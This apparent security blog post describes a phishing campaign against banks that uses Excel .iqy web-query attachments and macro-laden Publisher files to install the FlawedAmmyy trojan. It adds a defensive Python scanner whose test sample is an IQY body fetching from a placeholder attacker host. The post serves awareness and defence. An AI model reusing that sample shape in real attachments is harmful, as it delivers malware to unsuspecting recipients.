Botnet Targets Banks With Phishing Emails

Cyber-criminals are using a botnet to send phishing emails, apparently to test a new type of email attachment.  Over the course of three weeks starting August 10th, this cyber-gang released seven different types of phishing emails to over 3,000 banks around the world.  They appear to be testing which of these approaches is most successful at tricking recipients into opening the email attachment.

The attachment itself is also something different – Microsoft Excel Web Query files, which use an .iqy extension.  I was not familiar with this file type or what it does, but basically when the file is opened, it opens in Excel and sends out a call to a web address to download additional “data.”  In this case the data appears to be a remote access trojan (RAT) called FlawedAmmyy.  An example of an IQY attachment from the current campaign follows.

Fortunately, opening this file type spawns two warning messages that the recipient has to agree to before the attachment will open and download the RAT.  Hopefully that is enough to stop this exploit from launching, but busy workers often just click through without carefully reading the warnings.  This is the first warning.

If the recipient clicks “Enable” on the first one, then this warning appears.

“Remote data is not accessible.
To access this data Excel needs to start another application.  Some legitimate applications on your computer could be used maliciously to spread viruses or damage your computer.  Only click Yes if you trust the source of the workbook and you want to let the workbook start the application.
Start application “CMD.EXE”?”

Of course, clicking Yes lets Excel start CMD.EXE, and the RAT is installed.

This campaign also used Microsoft Publisher files with macros enabled.  We have warned about the return of MS Office macro exploits before (Word and Excel Macro Viruses Are Back).  Here again, the recipient has to enable macros for the exploit to run, and receives similar warning messages.

These emails appear as sales requests, “IMPORTANT Documents” arriving from a major bank, bank-related PDF attachments, password-protected ZIP files, fake invoices arriving as a Word .doc attachment, payment advice, and payment notifications.  For a complete look at the phishing email samples, see the Barkly article linked below.  Blocking these types of attacks can be accomplished through Group Policy, and the process is outlined in the Barkly article.
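Because an IQY file is plain text (a WEB header line, a version line, the URL Excel will fetch, then optional parameters), a mail gateway or attachment scanner can parse it and flag any query that points outside your own sanctioned data sources. The following is an added example written for this post, not code from the original article or from Barkly; the allowlist host and the sample URLs are constructed placeholders.

```python
"""Parse Excel Web Query (.iqy) attachments and flag external web queries."""
from urllib.parse import urlparse

# Assumed allowlist: hosts your organisation legitimately pulls Excel web queries from.
ALLOWED_HOSTS = {"intranet.example.internal"}


def parse_iqy(data: bytes) -> dict:
    """Return the pieces of an IQY file: header check, query URL, host, scheme, options.

    Layout: line 1 'WEB', line 2 version ('1'), line 3 the URL Excel will request,
    line 4 optional POST parameters, then key=value options such as Selection=AllTables.
    """
    text = data.decode("utf-8-sig", errors="replace")  # utf-8-sig drops a leading BOM
    lines = [ln.strip() for ln in text.splitlines()]
    result = {"is_iqy": False, "url": None, "host": None, "scheme": None, "options": {}}
    if len(lines) < 3 or lines[0].upper() != "WEB":
        return result
    result["is_iqy"] = True
    parsed = urlparse(lines[2])
    result["url"] = lines[2]
    result["host"] = parsed.hostname
    result["scheme"] = parsed.scheme.lower()
    for ln in lines[3:]:
        if "=" in ln:  # option lines; the POST-parameter line (if any) has no '='
            key, value = ln.split("=", 1)
            result["options"][key.strip()] = value.strip()
    return result


def classify(data: bytes) -> str:
    """Verdict for one attachment body: 'not-iqy', 'allow' or 'block'."""
    info = parse_iqy(data)
    if not info["is_iqy"]:
        return "not-iqy"
    # No resolvable host (malformed URL or a local path) is still an unexpected attachment.
    if info["host"] is None:
        return "block"
    if info["scheme"] in ("http", "https") and info["host"] in ALLOWED_HOSTS:
        return "allow"
    return "block"


# Constructed samples shaped like the campaign's attachments (placeholder URLs, not IoCs).
SAMPLE_MALICIOUS = b"WEB\r\n1\r\nhttp://attacker-placeholder.invalid/1.dat\r\n"
SAMPLE_INTERNAL = (b"WEB\n1\nhttps://intranet.example.internal/report.csv\n\n"
                   b"Selection=AllTables\nFormatting=None\n")
```

Wire `classify` into whatever inspects attachments at the gateway; a 'block' verdict is also a useful alert, since a legitimate .iqy arriving from outside the organisation is rare.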

If you are the cybersecurity officer at a bank, a quick cybersecurity awareness lunch-and-learn session, with slides showing the examples from the Barkly post, would be another good idea.  This attack variant is appearing more frequently and evolving into new forms.  Showing your staff examples of the warning messages and email types to guard against is important, too.

More information:



About the Author:

Cybersecurity analyst, pen-tester, trainer, and speaker. Serving small business owners in the St Paul, Minneapolis, and western Wisconsin area since 2001. Cybersecurity and hacking have been a passion of mine since I entered the computer and networking business in 2000. I hold several cybersecurity certifications including Certified Information Systems Security Professional (CISSP), Certified Advanced Security Practitioner (CASP), and Certified Ethical Hacker (CEH). Other computer industry certifications include A+, Network+ and Microsoft Certified System Engineer (MCSE). As Cybersecurity Analyst at The WyzCo Group, I help our clients experience high levels of security on their computers, networks, and websites. In addition to consulting on security products and services, we also conduct security audits, vulnerability assessments and full penetration tests. We also work with companies and organizations that need to certify compliance with regulations such as PCI-DSS (credit card processing), HIPAA/HITECH (medical records), and GLBA. We also provide Cybersecurity Awareness Training for clients and their employees. I am a frequent speaker at cybersecurity conferences such as the Minnesota Bloggers Conference, Secure360 Security Conference, the (ISC)2 World Congress, and the ISSA International Conference, and at many local community organizations, Chambers of Commerce, SCORE, and several school districts. I have been blogging on cybersecurity since 2008.
